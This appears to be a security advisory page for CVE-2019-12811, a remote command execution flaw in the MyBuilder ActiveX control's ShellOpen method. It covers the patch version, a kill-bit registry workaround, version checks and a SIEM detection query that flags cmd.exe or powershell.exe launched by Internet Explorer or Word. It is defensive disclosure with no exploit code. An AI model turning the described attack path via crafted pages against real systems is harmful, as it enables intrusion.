CVE-2019-12811
📋 TL;DR
This vulnerability allows remote attackers to execute arbitrary commands through the ShellOpen method in MyBuilder ActiveX Control. Attackers can leverage this for full system compromise. Users of MyBuilder software before version 6.2.2019.814 are affected.
💻 Affected Systems
- MyBuilder
📦 What is this software?
Mybuilder by Activesoft
⚠️ Risk & Real-World Impact
Worst Case
Complete system takeover with administrative privileges, data theft, ransomware deployment, and lateral movement across the network.
Likely Case
Remote code execution leading to malware installation, credential theft, and persistent backdoor establishment.
If Mitigated
Limited impact if ActiveX controls are disabled or restricted via security zones, though functionality loss may occur.
🎯 Exploit Status
Simple exploitation via crafted web pages or Office documents that instantiate the vulnerable ActiveX control.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.2.2019.814 or later
Vendor Advisory: https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=35155
Restart Required: Yes
Instructions:
1. Download latest MyBuilder version from official vendor site. 2. Uninstall previous version. 3. Install updated version. 4. Restart system.
🔧 Temporary Workarounds
Disable ActiveX Control via Kill Bit
windowsSet kill bit in registry to prevent control from loading
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 /f
Restrict ActiveX via Internet Explorer Security Zones
windowsConfigure IE to disable ActiveX controls in Internet and Trusted zones
🧯 If You Can't Patch
- Disable ActiveX entirely in Internet Explorer settings
- Use application whitelisting to block MyBuilder execution
🔍 How to Verify
Check if Vulnerable:
Check MyBuilder version via Help > About or registry: HKEY_LOCAL_MACHINE\SOFTWARE\MyBuilder\VersionCheck Version:
reg query "HKLM\SOFTWARE\MyBuilder" /v VersionVerify Fix Applied:
Confirm version is 6.2.2019.814 or higher and test ShellOpen method with safe parameters📡 Detection & Monitoring
Log Indicators:
- Process creation from iexplore.exe or office applications spawning unusual child processes
- Registry modifications to ActiveX compatibility settings
Network Indicators:
- HTTP requests to unusual domains following ActiveX instantiation
- Outbound connections from unexpected processes
SIEM Query:
Process Creation where (ParentImage contains "iexplore.exe" OR ParentImage contains "winword.exe") AND (CommandLine contains "cmd.exe" OR CommandLine contains "powershell.exe")